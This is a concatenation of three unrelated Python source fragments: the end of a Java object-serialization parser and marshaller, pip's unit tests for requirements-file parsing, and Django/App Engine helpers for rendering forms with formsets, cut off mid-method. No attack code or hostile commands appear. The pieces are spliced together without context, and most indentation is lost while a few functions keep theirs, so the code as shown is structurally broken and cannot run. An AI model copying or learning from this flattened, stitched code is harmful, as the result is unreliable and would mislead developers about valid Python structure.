assert isinstance(field_type, str)
log_debug("FieldName: 0x%X" % typecode + " " + str(field_name) + " " + str(field_type), ident)
assert field_name is not None
assert field_type is not None
clazz.fields_names.append(field_name)
clazz.fields_types.append(field_type)
# pylint: disable=protected-access
if parent:
parent.__fields = clazz.fields_names
parent.__types = clazz.fields_types
# classAnnotation
(opid, ) = self._readStruct(">B")
log_debug("OpCode: 0x%X" % opid, ident)
if opid != self.TC_ENDBLOCKDATA:
raise NotImplementedError("classAnnotation isn't implemented yet")
# superClassDesc
_, superclassdesc = self._read_and_exec_opcode(
ident=ident+1, expect=[self.TC_CLASSDESC, self.TC_NULL, self.TC_REFERENCE])
log_debug(str(superclassdesc), ident)
clazz.superclass = superclassdesc
return clazz
# pylint: disable=unused-argument
def do_blockdata(self, parent=None, ident=0):
# TC_BLOCKDATA (unsigned byte)<size> (byte)[size]
log_debug("[blockdata]", ident)
(length, ) = self._readStruct(">B")
ba = self.object_stream.read(length)
return ba
def do_class(self, parent=None, ident=0):
# TC_CLASS classDesc newHandle
log_debug("[class]", ident)
_, classdesc = self._read_and_exec_opcode(
ident=ident+1, expect=[self.TC_CLASSDESC, self.TC_PROXYCLASSDESC,
self.TC_NULL, self.TC_REFERENCE])
log_debug("Classdesc: %s" % classdesc, ident)
self._add_reference(classdesc)
return classdesc
def do_object(self, parent=None, ident=0):
# TC_OBJECT classDesc newHandle classdata[] // data for each class
java_object = JavaObject()
log_debug("[object]", ident)
log_debug("java_object.annotations just after instantination: " +
str(java_object.annotations), ident)
opcode, classdesc = self._read_and_exec_opcode(
ident=ident+1, expect=[self.TC_CLASSDESC, self.TC_PROXYCLASSDESC,
self.TC_NULL, self.TC_REFERENCE])
    # self.TC_REFERENCE is not shown in the spec here, but does appear in practice
self._add_reference(java_object)
# classdata[]
# Store classdesc of this object
java_object.classdesc = classdesc
if classdesc.flags & self.SC_EXTERNALIZABLE and not classdesc.flags & self.SC_BLOCK_DATA:
raise NotImplementedError("externalContents isn't implemented yet")
if classdesc.flags & self.SC_SERIALIZABLE:
# create megalist
tempclass = classdesc
megalist = []
megatypes = []
while tempclass:
log_debug(">>> " + str(tempclass.fields_names) + " " + str(tempclass), ident)
log_debug(">>> " + str(tempclass.fields_types), ident)
fieldscopy = tempclass.fields_names[:]
fieldscopy.extend(megalist)
megalist = fieldscopy
fieldscopy = tempclass.fields_types[:]
fieldscopy.extend(megatypes)
megatypes = fieldscopy
tempclass = tempclass.superclass
log_debug("Values count: %s" % str(len(megalist)), ident)
log_debug("Prepared list of values: %s" % str(megalist), ident)
log_debug("Prepared list of types: %s" % str(megatypes), ident)
for field_name, field_type in zip(megalist, megatypes):
res = self._read_value(field_type, ident, name=field_name)
java_object.__setattr__(field_name, res)
if classdesc.flags & self.SC_SERIALIZABLE and classdesc.flags & \
self.SC_WRITE_METHOD or classdesc.flags & self.SC_EXTERNALIZABLE \
and classdesc.flags & self.SC_BLOCK_DATA:
# objectAnnotation
log_debug("java_object.annotations before: " + str(java_object.annotations), ident)
while opcode != self.TC_ENDBLOCKDATA:
opcode, obj = self._read_and_exec_opcode(ident=ident+1)
if opcode != self.TC_ENDBLOCKDATA:
java_object.annotations.append(obj)
log_debug("objectAnnotation value: " + str(obj), ident)
log_debug("java_object.annotations after: " + str(java_object.annotations), ident)
# Transform object
for transformer in self.object_transformers:
tmp_object = transformer.transform(java_object)
if tmp_object != java_object:
java_object = tmp_object
break
log_debug(">>> java_object: " + str(java_object), ident)
return java_object
def do_string(self, parent=None, ident=0):
log_debug("[string]", ident)
ba = self._readString()
self._add_reference(str(ba))
return str(ba)
def do_array(self, parent=None, ident=0):
# TC_ARRAY classDesc newHandle (int)<size> values[size]
log_debug("[array]", ident)
_, classdesc = self._read_and_exec_opcode(
ident=ident+1, expect=[self.TC_CLASSDESC,
self.TC_PROXYCLASSDESC, self.TC_NULL, self.TC_REFERENCE])
array = []
self._add_reference(array)
(size, ) = self._readStruct(">i")
log_debug("size: " + str(size), ident)
type_char = classdesc.name[0]
assert type_char == self.TYPE_ARRAY
type_char = classdesc.name[1]
if type_char in (self.TYPE_OBJECT, self.TYPE_ARRAY):
for _ in range(size):
_, res = self._read_and_exec_opcode(ident=ident+1)
log_debug("Object value: %s" % str(res), ident)
array.append(res)
else:
for _ in range(size):
res = self._read_value(type_char, ident)
log_debug("Native value: %s" % str(res), ident)
array.append(res)
return array
def do_reference(self, parent=None, ident=0):
(handle, ) = self._readStruct(">L")
log_debug("## Reference handle: 0x%x" % (handle), ident)
return self.references[handle - self.BASE_REFERENCE_IDX]
# pylint: disable=no-self-use
def do_null(self, parent=None, ident=0):
return None
def do_enum(self, parent=None, ident=0):
# TC_ENUM classDesc newHandle enumConstantName
enum = JavaObject()
_ = self._read_and_exec_opcode(
ident=ident+1, expect=[self.TC_CLASSDESC,
self.TC_PROXYCLASSDESC, self.TC_NULL, self.TC_REFERENCE])
self._add_reference(enum)
_, enumConstantName = self._read_and_exec_opcode(
ident=ident+1, expect=[self.TC_STRING, self.TC_REFERENCE])
return enumConstantName
  def _create_hexdump(self, src, length=16):
    # Classic offset / hex / printable dump; iterate via bytearray so the same
    # code handles byte strings under Python 3 (where iterating bytes yields ints).
    result = []
    for i in range(0, len(src), length):
      s = src[i:i + length]
      hexa = ' '.join(["%02X" % c for c in bytearray(s)])
      printable = ''.join([chr(c) if 32 <= c < 127 else '.' for c in bytearray(s)])
      result.append("%04X %-*s %s\n" % (i, length * 3, hexa, printable))
    return ''.join(result)
def _read_value(self, field_type, ident, name=""):
if len(field_type) > 1:
field_type = field_type[0] # We don't need details for arrays and objects
if field_type == self.TYPE_BOOLEAN:
(val, ) = self._readStruct(">B")
res = bool(val)
elif field_type == self.TYPE_BYTE:
(res, ) = self._readStruct(">b")
elif field_type == self.TYPE_SHORT:
(res, ) = self._readStruct(">h")
elif field_type == self.TYPE_INTEGER:
(res, ) = self._readStruct(">i")
elif field_type == self.TYPE_LONG:
(res, ) = self._readStruct(">q")
elif field_type == self.TYPE_FLOAT:
(res, ) = self._readStruct(">f")
elif field_type == self.TYPE_DOUBLE:
(res, ) = self._readStruct(">d")
elif field_type in (self.TYPE_OBJECT, self.TYPE_ARRAY):
_, res = self._read_and_exec_opcode(ident=ident+1)
else:
raise RuntimeError("Unknown typecode: %s" % field_type)
log_debug("* %s %s: " % (field_type, name) + str(res), ident)
return res
def _convert_char_to_type(self, type_char):
typecode = type_char
if isinstance(type_char, int):
typecode = chr(type_char)
if typecode in self.TYPECODES_LIST:
return typecode
raise RuntimeError("Typecode %s (%s) isn't supported." % (type_char, typecode))
def _add_reference(self, obj):
self.references.append(obj)
def _oops_dump_state(self):
log_error("==Oops state dump" + "=" * (30 - 17))
log_error("References: %s" % str(self.references))
log_error("Stream seeking back at -16 byte (2nd line is an actual position!):")
    self.object_stream.seek(-16, 1)
the_rest = self.object_stream.read()
if the_rest:
log_error("Warning!!!!: Stream still has %s bytes left." % len(the_rest))
log_error(self._create_hexdump(the_rest))
log_error("=" * 30)
class JavaObjectMarshaller(JavaObjectConstants):
def __init__(self, stream=None):
self.object_stream = stream
# pylint: disable=attribute-defined-outside-init
def dump(self, obj):
self.object_obj = obj
self.object_stream = io.BytesIO()
self._writeStreamHeader()
self.writeObject(obj)
return self.object_stream.getvalue()
def _writeStreamHeader(self):
self._writeStruct(">HH", 4, (self.STREAM_MAGIC, self.STREAM_VERSION))
def writeObject(self, obj):
log_debug("Writing object of type " + str(type(obj)))
if isinstance(obj, JavaObject):
self.write_object(obj)
elif isinstance(obj, str):
self.write_blockdata(obj)
else:
raise RuntimeError("Object serialization of type %s is not supported." % str(type(obj)))
def _writeStruct(self, unpack, _, args):
ba = struct.pack(unpack, *args)
self.object_stream.write(ba)
def _writeString(self, string):
l = len(string)
self._writeStruct(">H", 2, (l, ))
self.object_stream.write(string)
# pylint: disable=unused-argument
def write_blockdata(self, obj, parent=None):
# TC_BLOCKDATA (unsigned byte)<size> (byte)[size]
self._writeStruct(">B", 1, (self.TC_BLOCKDATA, ))
if isinstance(obj, str):
self._writeStruct(">B", 1, (len(obj), ))
self.object_stream.write(obj)
def write_object(self, obj, parent=None):
self._writeStruct(">B", 1, (self.TC_OBJECT, ))
self._writeStruct(">B", 1, (self.TC_CLASSDESC, ))
class DefaultObjectTransformer:
class JavaList(list, JavaObject):
pass
class JavaMap(dict, JavaObject):
pass
def transform(self, obj):
if obj.get_class().name == "java.util.ArrayList":
# * @serialData The length of the array backing the <tt>ArrayList</tt>
# * instance is emitted (int), followed by all of its elements
# * (each an <tt>Object</tt>) in the proper order.
new_object = self.JavaList()
obj.copy(new_object)
new_object.extend(obj.annotations[1:])
return new_object
if obj.get_class().name == "java.util.LinkedList":
new_object = self.JavaList()
obj.copy(new_object)
new_object.extend(obj.annotations[1:])
return new_object
if obj.get_class().name == "java.util.HashMap":
new_object = self.JavaMap()
obj.copy(new_object)
      for i in range((len(obj.annotations) - 1) // 2):
new_object[obj.annotations[i*2+1]] = obj.annotations[i*2+2]
return new_object
return obj
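# Hedged sketch of a custom transformer: any object with a transform(obj)
# method can be registered alongside DefaultObjectTransformer. The class and
# field names below are illustrative only, not part of the original module.
#
#   class MoneyTransformer:
#       def transform(self, obj):
#           if obj.classname() == "com.example.Money":
#               return getattr(obj, "amount", obj)
#           return obj
#
#   unmarshaller = JavaObjectUnmarshaller(stream)
#   unmarshaller.add_transformer(DefaultObjectTransformer())
#   unmarshaller.add_transformer(MoneyTransformer())
#   result = unmarshaller.readObject()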
|
|
import os
import subprocess
from textwrap import dedent
from mock import patch, Mock
import pytest
from pretend import stub
import pip
from pip.exceptions import (RequirementsFileParseError)
from pip.download import PipSession
from pip.index import PackageFinder
from pip.req.req_install import InstallRequirement
from pip.req.req_file import (parse_requirements, process_line, join_lines,
ignore_comments, break_args_options)
@pytest.fixture
def session():
return PipSession()
@pytest.fixture
def finder(session):
return PackageFinder([], [], session=session)
@pytest.fixture
def options(session):
return stub(
isolated_mode=False, default_vcs=None, index_url='default_url',
skip_requirements_regex=False,
format_control=pip.index.FormatControl(set(), set()))
class TestIgnoreComments(object):
"""tests for `ignore_comment`"""
def test_strip_empty_line(self):
lines = ['req1', '', 'req2']
result = ignore_comments(lines)
assert list(result) == ['req1', 'req2']
def test_strip_comment(self):
lines = ['req1', '# comment', 'req2']
result = ignore_comments(lines)
assert list(result) == ['req1', 'req2']
class TestJoinLines(object):
"""tests for `join_lines`"""
def test_join_lines(self):
lines = dedent('''\
line 1
line 2:1 \\
line 2:2
line 3:1 \\
line 3:2 \\
line 3:3
line 4
''').splitlines()
expect = [
'line 1',
'line 2:1 line 2:2',
'line 3:1 line 3:2 line 3:3',
'line 4',
]
assert expect == list(join_lines(lines))
class TestProcessLine(object):
"""tests for `process_line`"""
def test_parser_error(self):
with pytest.raises(RequirementsFileParseError):
list(process_line("--bogus", "file", 1))
def test_only_one_req_per_line(self):
# pkg_resources raises the ValueError
with pytest.raises(ValueError):
list(process_line("req1 req2", "file", 1))
def test_yield_line_requirement(self):
line = 'SomeProject'
filename = 'filename'
comes_from = '-r %s (line %s)' % (filename, 1)
req = InstallRequirement.from_line(line, comes_from=comes_from)
assert repr(list(process_line(line, filename, 1))[0]) == repr(req)
def test_yield_line_constraint(self):
line = 'SomeProject'
filename = 'filename'
comes_from = '-c %s (line %s)' % (filename, 1)
req = InstallRequirement.from_line(
line, comes_from=comes_from, constraint=True)
found_req = list(process_line(line, filename, 1, constraint=True))[0]
assert repr(found_req) == repr(req)
assert found_req.constraint is True
def test_yield_line_requirement_with_spaces_in_specifier(self):
line = 'SomeProject >= 2'
filename = 'filename'
comes_from = '-r %s (line %s)' % (filename, 1)
req = InstallRequirement.from_line(line, comes_from=comes_from)
assert repr(list(process_line(line, filename, 1))[0]) == repr(req)
assert req.req.specs == [('>=', '2')]
def test_yield_editable_requirement(self):
url = 'git+https://url#egg=SomeProject'
line = '-e %s' % url
filename = 'filename'
comes_from = '-r %s (line %s)' % (filename, 1)
req = InstallRequirement.from_editable(url, comes_from=comes_from)
assert repr(list(process_line(line, filename, 1))[0]) == repr(req)
def test_yield_editable_constraint(self):
url = 'git+https://url#egg=SomeProject'
line = '-e %s' % url
filename = 'filename'
comes_from = '-c %s (line %s)' % (filename, 1)
req = InstallRequirement.from_editable(
url, comes_from=comes_from, constraint=True)
found_req = list(process_line(line, filename, 1, constraint=True))[0]
assert repr(found_req) == repr(req)
assert found_req.constraint is True
def test_nested_requirements_file(self, monkeypatch):
line = '-r another_file'
req = InstallRequirement.from_line('SomeProject')
import pip.req.req_file
def stub_parse_requirements(req_url, finder, comes_from, options,
session, wheel_cache, constraint):
return [(req, constraint)]
parse_requirements_stub = stub(call=stub_parse_requirements)
monkeypatch.setattr(pip.req.req_file, 'parse_requirements',
parse_requirements_stub.call)
assert list(process_line(line, 'filename', 1)) == [(req, False)]
def test_nested_constraints_file(self, monkeypatch):
line = '-c another_file'
req = InstallRequirement.from_line('SomeProject')
import pip.req.req_file
def stub_parse_requirements(req_url, finder, comes_from, options,
session, wheel_cache, constraint):
return [(req, constraint)]
parse_requirements_stub = stub(call=stub_parse_requirements)
monkeypatch.setattr(pip.req.req_file, 'parse_requirements',
parse_requirements_stub.call)
assert list(process_line(line, 'filename', 1)) == [(req, True)]
def test_options_on_a_requirement_line(self):
line = 'SomeProject --install-option=yo1 --install-option yo2 '\
'--global-option="yo3" --global-option "yo4"'
filename = 'filename'
req = list(process_line(line, filename, 1))[0]
assert req.options == {
'global_options': ['yo3', 'yo4'],
'install_options': ['yo1', 'yo2']}
def test_set_isolated(self, options):
line = 'SomeProject'
filename = 'filename'
options.isolated_mode = True
result = process_line(line, filename, 1, options=options)
assert list(result)[0].isolated
def test_set_default_vcs(self, options):
url = 'https://url#egg=SomeProject'
line = '-e %s' % url
filename = 'filename'
options.default_vcs = 'git'
result = process_line(line, filename, 1, options=options)
assert list(result)[0].link.url == 'git+' + url
def test_set_finder_no_index(self, finder):
list(process_line("--no-index", "file", 1, finder=finder))
assert finder.index_urls == []
def test_set_finder_index_url(self, finder):
list(process_line("--index-url=url", "file", 1, finder=finder))
assert finder.index_urls == ['url']
def test_set_finder_find_links(self, finder):
list(process_line("--find-links=url", "file", 1, finder=finder))
assert finder.find_links == ['url']
def test_set_finder_extra_index_urls(self, finder):
list(process_line("--extra-index-url=url", "file", 1, finder=finder))
assert finder.index_urls == ['url']
def test_set_finder_allow_external(self, finder):
list(process_line("--allow-external=SomeProject",
"file", 1, finder=finder))
assert finder.allow_external == set(['someproject'])
def test_set_finder_allow_unsafe(self, finder):
list(process_line("--allow-unverified=SomeProject",
"file", 1, finder=finder))
assert finder.allow_unverified == set(['someproject'])
def test_set_finder_use_wheel(self, finder):
list(process_line("--use-wheel", "file", 1, finder=finder))
no_use_wheel_fmt = pip.index.FormatControl(set(), set())
assert finder.format_control == no_use_wheel_fmt
def test_set_finder_no_use_wheel(self, finder):
list(process_line("--no-use-wheel", "file", 1, finder=finder))
no_use_wheel_fmt = pip.index.FormatControl(set([':all:']), set())
assert finder.format_control == no_use_wheel_fmt
def test_noop_always_unzip(self, finder):
# noop, but confirm it can be set
list(process_line("--always-unzip", "file", 1, finder=finder))
def test_noop_finder_no_allow_unsafe(self, finder):
# noop, but confirm it can be set
list(process_line("--no-allow-insecure", "file", 1, finder=finder))
def test_relative_local_find_links(self, finder, monkeypatch):
"""
Test a relative find_links path is joined with the req file directory
"""
req_file = '/path/req_file.txt'
nested_link = '/path/rel_path'
exists_ = os.path.exists
def exists(path):
if path == nested_link:
return True
else:
                return exists_(path)
monkeypatch.setattr(os.path, 'exists', exists)
list(process_line("--find-links=rel_path", req_file, 1,
finder=finder))
assert finder.find_links == [nested_link]
def test_relative_http_nested_req_files(self, finder, monkeypatch):
"""
Test a relative nested req file path is joined with the req file url
"""
req_file = 'http://me.com/me/req_file.txt'
def parse(*args, **kwargs):
return iter([])
mock_parse = Mock()
mock_parse.side_effect = parse
monkeypatch.setattr(pip.req.req_file, 'parse_requirements', mock_parse)
list(process_line("-r reqs.txt", req_file, 1, finder=finder))
call = mock_parse.mock_calls[0]
assert call[1][0] == 'http://me.com/me/reqs.txt'
def test_relative_local_nested_req_files(self, finder, monkeypatch):
"""
Test a relative nested req file path is joined with the req file dir
"""
req_file = '/path/req_file.txt'
def parse(*args, **kwargs):
return iter([])
mock_parse = Mock()
mock_parse.side_effect = parse
monkeypatch.setattr(pip.req.req_file, 'parse_requirements', mock_parse)
list(process_line("-r reqs.txt", req_file, 1, finder=finder))
call = mock_parse.mock_calls[0]
assert call[1][0] == '/path/reqs.txt'
def test_absolute_local_nested_req_files(self, finder, monkeypatch):
"""
Test an absolute nested req file path
"""
req_file = '/path/req_file.txt'
def parse(*args, **kwargs):
return iter([])
mock_parse = Mock()
mock_parse.side_effect = parse
monkeypatch.setattr(pip.req.req_file, 'parse_requirements', mock_parse)
list(process_line("-r /other/reqs.txt", req_file, 1, finder=finder))
call = mock_parse.mock_calls[0]
assert call[1][0] == '/other/reqs.txt'
def test_absolute_http_nested_req_file_in_local(self, finder, monkeypatch):
"""
Test a nested req file url in a local req file
"""
req_file = '/path/req_file.txt'
def parse(*args, **kwargs):
return iter([])
mock_parse = Mock()
mock_parse.side_effect = parse
monkeypatch.setattr(pip.req.req_file, 'parse_requirements', mock_parse)
list(process_line("-r http://me.com/me/reqs.txt", req_file, 1,
finder=finder))
call = mock_parse.mock_calls[0]
assert call[1][0] == 'http://me.com/me/reqs.txt'
class TestBreakOptionsArgs(object):
def test_no_args(self):
assert ('', '--option') == break_args_options('--option')
def test_no_options(self):
assert ('arg arg', '') == break_args_options('arg arg')
def test_args_short_options(self):
result = break_args_options('arg arg -s')
assert ('arg arg', '-s') == result
def test_args_long_options(self):
result = break_args_options('arg arg --long')
assert ('arg arg', '--long') == result
class TestOptionVariants(object):
# this suite is really just testing optparse, but added it anyway
def test_variant1(self, finder):
list(process_line("-i url", "file", 1, finder=finder))
assert finder.index_urls == ['url']
def test_variant2(self, finder):
list(process_line("-i 'url'", "file", 1, finder=finder))
assert finder.index_urls == ['url']
def test_variant3(self, finder):
list(process_line("--index-url=url", "file", 1, finder=finder))
assert finder.index_urls == ['url']
def test_variant4(self, finder):
list(process_line("--index-url url", "file", 1, finder=finder))
assert finder.index_urls == ['url']
def test_variant5(self, finder):
list(process_line("--index-url='url'", "file", 1, finder=finder))
assert finder.index_urls == ['url']
class TestParseRequirements(object):
"""tests for `parse_requirements`"""
@pytest.mark.network
def test_remote_reqs_parse(self):
"""
Test parsing a simple remote requirements file
"""
        # this requirements file just contains a comment; previously this
        # failed in py3: https://github.com/pypa/pip/issues/760
for req in parse_requirements(
'https://raw.githubusercontent.com/pypa/'
'pip-test-package/master/'
'tests/req_just_comment.txt', session=PipSession()):
pass
def test_multiple_appending_options(self, tmpdir, finder, options):
with open(tmpdir.join("req1.txt"), "w") as fp:
fp.write("--extra-index-url url1 \n")
fp.write("--extra-index-url url2 ")
list(parse_requirements(tmpdir.join("req1.txt"), finder=finder,
session=PipSession(), options=options))
assert finder.index_urls == ['url1', 'url2']
def test_skip_regex(self, tmpdir, finder, options):
options.skip_requirements_regex = '.*Bad.*'
with open(tmpdir.join("req1.txt"), "w") as fp:
fp.write("--extra-index-url Bad \n")
fp.write("--extra-index-url Good ")
list(parse_requirements(tmpdir.join("req1.txt"), finder=finder,
options=options, session=PipSession()))
assert finder.index_urls == ['Good']
def test_join_lines(self, tmpdir, finder):
with open(tmpdir.join("req1.txt"), "w") as fp:
fp.write("--extra-index-url url1 \\\n--extra-index-url url2")
list(parse_requirements(tmpdir.join("req1.txt"), finder=finder,
session=PipSession()))
assert finder.index_urls == ['url1', 'url2']
def test_req_file_parse_no_only_binary(self, data, finder):
list(parse_requirements(
data.reqfiles.join("supported_options2.txt"), finder,
session=PipSession()))
expected = pip.index.FormatControl(set(['fred']), set(['wilma']))
assert finder.format_control == expected
def test_req_file_parse_comment_start_of_line(self, tmpdir, finder):
"""
Test parsing comments in a requirements file
"""
with open(tmpdir.join("req1.txt"), "w") as fp:
fp.write("# Comment ")
reqs = list(parse_requirements(tmpdir.join("req1.txt"), finder,
session=PipSession()))
assert not reqs
def test_req_file_parse_comment_end_of_line_with_url(self, tmpdir, finder):
"""
Test parsing comments in a requirements file
"""
with open(tmpdir.join("req1.txt"), "w") as fp:
fp.write("https://example.com/foo.tar.gz # Comment ")
reqs = list(parse_requirements(tmpdir.join("req1.txt"), finder,
session=PipSession()))
assert len(reqs) == 1
assert reqs[0].link.url == "https://example.com/foo.tar.gz"
def test_req_file_parse_egginfo_end_of_line_with_url(self, tmpdir, finder):
"""
Test parsing comments in a requirements file
"""
with open(tmpdir.join("req1.txt"), "w") as fp:
fp.write("https://example.com/foo.tar.gz#egg=wat")
reqs = list(parse_requirements(tmpdir.join("req1.txt"), finder,
session=PipSession()))
assert len(reqs) == 1
assert reqs[0].name == "wat"
def test_req_file_no_finder(self, tmpdir):
"""
Test parsing a requirements file without a finder
"""
with open(tmpdir.join("req.txt"), "w") as fp:
fp.write("""
--find-links https://example.com/
--index-url https://example.com/
--extra-index-url https://two.example.com/
--no-use-wheel
--no-index
--allow-external foo
--allow-all-external
--allow-insecure foo
--allow-unverified foo
""")
parse_requirements(tmpdir.join("req.txt"), session=PipSession())
def test_install_requirements_with_options(self, tmpdir, finder, session,
options):
global_option = '--dry-run'
install_option = '--prefix=/opt'
content = '''
--only-binary :all:
INITools==2.0 --global-option="{global_option}" \
--install-option "{install_option}"
'''.format(global_option=global_option, install_option=install_option)
req_path = tmpdir.join('requirements.txt')
with open(req_path, 'w') as fh:
fh.write(content)
req = next(parse_requirements(
req_path, finder=finder, options=options, session=session))
req.source_dir = os.curdir
with patch.object(subprocess, 'Popen') as popen:
popen.return_value.stdout.readline.return_value = ""
try:
req.install([])
except:
pass
call = popen.call_args_list[0][0][0]
assert call.index(install_option) > \
call.index('install') > \
call.index(global_option) > 0
assert options.format_control.no_binary == set([':all:'])
assert options.format_control.only_binary == set([])
def test_allow_all_external(self, tmpdir):
req_path = tmpdir.join("requirements.txt")
with open(req_path, "w") as fh:
fh.write("""
--allow-all-external
foo
""")
list(parse_requirements(req_path, session=PipSession()))
|
|
from copy import deepcopy
import re
from django import forms
from django.utils.datastructures import SortedDict, MultiValueDict
from django.utils.html import conditional_escape
from django.utils.encoding import StrAndUnicode, smart_unicode, force_unicode
from django.utils.safestring import mark_safe
from django.forms.widgets import flatatt
from google.appengine.ext import db
from ragendja.dbutils import transaction
class FakeModelIterator(object):
def __init__(self, fake_model):
self.fake_model = fake_model
def __iter__(self):
for item in self.fake_model.all():
yield (item.get_value_for_datastore(), unicode(item))
class FakeModelChoiceField(forms.ChoiceField):
def __init__(self, fake_model, *args, **kwargs):
self.fake_model = fake_model
kwargs['choices'] = ()
super(FakeModelChoiceField, self).__init__(*args, **kwargs)
def _get_choices(self):
return self._choices
def _set_choices(self, choices):
self._choices = self.widget.choices = FakeModelIterator(self.fake_model)
choices = property(_get_choices, _set_choices)
def clean(self, value):
value = super(FakeModelChoiceField, self).clean(value)
return self.fake_model.make_value_from_datastore(value)
class FakeModelMultipleChoiceField(forms.MultipleChoiceField):
def __init__(self, fake_model, *args, **kwargs):
self.fake_model = fake_model
kwargs['choices'] = ()
super(FakeModelMultipleChoiceField, self).__init__(*args, **kwargs)
def _get_choices(self):
return self._choices
def _set_choices(self, choices):
self._choices = self.widget.choices = FakeModelIterator(self.fake_model)
choices = property(_get_choices, _set_choices)
def clean(self, value):
value = super(FakeModelMultipleChoiceField, self).clean(value)
return [self.fake_model.make_value_from_datastore(item)
for item in value]
class FormWithSets(object):
def __init__(self, form, formsets=()):
self.form = form
setattr(self, '__module__', form.__module__)
setattr(self, '__name__', form.__name__ + 'WithSets')
setattr(self, '__doc__', form.__doc__)
self._meta = form._meta
fields = [(name, field) for name, field in form.base_fields.iteritems() if isinstance(field, FormSetField)]
formset_dict = dict(formsets)
newformsets = []
for name, field in fields:
if formset_dict.has_key(name):
continue
newformsets.append((name, {'formset':field.make_formset(form._meta.model)}))
self.formsets = formsets + tuple(newformsets)
def __call__(self, *args, **kwargs):
prefix = kwargs['prefix'] + '-' if 'prefix' in kwargs else ''
form = self.form(*args, **kwargs)
if 'initial' in kwargs:
del kwargs['initial']
formsets = []
for name, formset in self.formsets:
kwargs['prefix'] = prefix + name
instance = formset['formset'](*args, **kwargs)
if form.base_fields.has_key(name):
field = form.base_fields[name]
else:
field = FormSetField(formset['formset'].model, **formset)
formsets.append(BoundFormSet(field, instance, name, formset))
return type(self.__name__ + 'Instance', (FormWithSetsInstance, ), {})(self, form, formsets)
def pretty_name(name):
"Converts 'first_name' to 'First name'"
name = name[0].upper() + name[1:]
return name.replace('_', ' ')
table_sections_re = re.compile(r'^(.*?)(<tr>.*</tr>)(.*?)$', re.DOTALL)
table_row_re = re.compile(r'(<tr>(<th><label.*?</label></th>)(<td>.*?</td>)</tr>)', re.DOTALL)
ul_sections_re = re.compile(r'^(.*?)(<li>.*</li>)(.*?)$', re.DOTALL)
ul_row_re = re.compile(r'(<li>(<label.*?</label>)(.*?)</li>)', re.DOTALL)
p_sections_re = re.compile(r'^(.*?)(<p>.*</p>)(.*?)$', re.DOTALL)
p_row_re = re.compile(r'(<p>(<label.*?</label>)(.*?)</p>)', re.DOTALL)
label_re = re.compile(r'^(.*)<label for="id_(.*?)">(.*)</label>(.*)$')
class BoundFormSet(StrAndUnicode):
def __init__(self, field, formset, name, args):
self.field = field
self.formset = formset
self.name = name
self.args = args
if self.field.label is None:
self.label = pretty_name(name)
else:
self.label = self.field.label
self.auto_id = self.formset.auto_id % self.formset.prefix
if args.has_key('attrs'):
self.attrs = args['attrs'].copy()
else:
self.attrs = {}
def __unicode__(self):
"""Renders this field as an HTML widget."""
return self.as_widget()
def as_widget(self, attrs=None):
"""
Renders the field by rendering the passed widget, adding any HTML
attributes passed as attrs. If no widget is specified, then the
field's default widget will be used.
"""
attrs = attrs or {}
auto_id = self.auto_id
if auto_id and 'id' not in attrs and not self.args.has_key('id'):
attrs['id'] = auto_id
try:
data = self.formset.as_table()
name = self.name
return self.render(name, data, attrs=attrs)
except Exception, e:
import traceback
return traceback.format_exc()
def render(self, name, value, attrs=None):
table_sections = table_sections_re.search(value).groups()
output = []
heads = []
current_row = []
first_row = True
first_head_id = None
prefix = 'id_%s-%%s-' % self.formset.prefix
for row, head, item in table_row_re.findall(table_sections[1]):
if first_row:
head_groups = label_re.search(head).groups()
if first_head_id == head_groups[1]:
first_row = False
output.append(current_row)
current_row = []
else:
heads.append('%s%s%s' % (head_groups[0], head_groups[2], head_groups[3]))
if first_head_id is None:
first_head_id = head_groups[1].replace('-0-','-1-')
current_row.append(item)
if not first_row and len(current_row) >= len(heads):
output.append(current_row)
current_row = []
if len(current_row) != 0:
raise Exception('Unbalanced render')
return mark_safe(u'%s<table%s><tr>%s</tr><tr>%s</tr></table>%s'%(
table_sections[0],
flatatt(attrs),
u''.join(heads),
u'</tr><tr>'.join((u''.join(x) for x in output)),
table_sections[2]))
class CachedQuerySet(object):
def __init__(self, get_queryset):
self.queryset_results = (x for x in get_queryset())
def __call__(self):
return self.queryset_results
class FormWithSetsInstance(object):
def __init__(self, master, form, formsets):
self.master = master
self.form = form
self.formsets = formsets
self.instance = form.instance
def __unicode__(self):
return self.as_table()
def is_valid(self):
result = self.form.is_valid()
for bf in self.formsets:
result = bf.formset.is_valid() and result
return result
def save(self, *args, **kwargs):
def save_forms(forms, obj=None):
for form in forms:
if not instance and form != self.form:
for row in form.forms:
row.cleaned_data[form.rel_name] = obj
form_obj = form.save(*args, **kwargs)
if form == self.form:
obj = form_obj
return obj
instance = self.form.instance
grouped = [self.form]
ungrouped = []
# cache the result of get_queryset so that it doesn't run inside the transaction
for bf in self.formsets:
if bf.formset.rel_name == 'parent':
grouped.append(bf.formset)
else:
ungrouped.append(bf.formset)
bf.formset_get_queryset = bf.formset.get_queryset
bf.formset.get_queryset = CachedQuerySet(bf.formset_get_queryset)
obj = db.run_in_transaction(save_forms, grouped)
save_forms(ungrouped, obj)
for bf in self.formsets:
bf.formset.get_queryset = bf.formset_get_queryset
del bf.formset_get_queryset
return obj
def _html_output(self, form_as, normal_row, help_text_html, sections_re, row_re):
formsets = SortedDict()
for bf in self.formsets:
if bf.label:
label = conditional_escape(force_unicode(bf.label))
# Only add the suffix if the label does not end in
# punctuation.
if self.form.label_suffix:
if label[-1] not in ':?.!':
label += self.form.label_suffix
label = label or ''
else:
label = ''
if bf.field.help_text:
help_text = help_text_html % force_unicode(bf.field.help_text)
else:
help_text = u''
formsets[bf.name] = normal_row % {'label': force_unicode(label), 'field': unicode(bf), 'help_text': help_text}
try:
output = []
data = form_as()
section_search = sections_re.search(data)
if not section_search:
output.append(data)
else:
section_groups = section_search.groups()
for row, head, item in row_re.findall(section_groups[1]):
head_search = label_re.search(head)
if head_search:
id = head_search.groups()[1]
if formsets.has_key(id):
row = formsets[id]
del formsets[id]
output.append(row)
for name, row in formsets.items():
if name in self.form.fields.keyOrder:
output.append(row)
return mark_safe(u'\n'.join(output))
        except Exception, e:
import traceback
return traceback.format_exc()
def as_table(self):
"Returns this form rendered as HTML <tr>s -- excluding the <table></table>."
return self._html_output(self.form.as_table, u'<tr><th>%(label)s</th><td>%(help_text)s%(field)s</td></tr>', u'<br />%s', table_sections_re, table_row_re)
def as_ul(self):
"Returns this form rendered as HTML <li>s -- excluding the <ul></ul>."
return self._html_output(self.form.as_ul, u'<li>%(label)s %(help_text)s%(field)s</li>', u' %s', ul_sections_re, ul_row_re)
def as_p(self):
"Returns this form rendered as HTML <p>s."
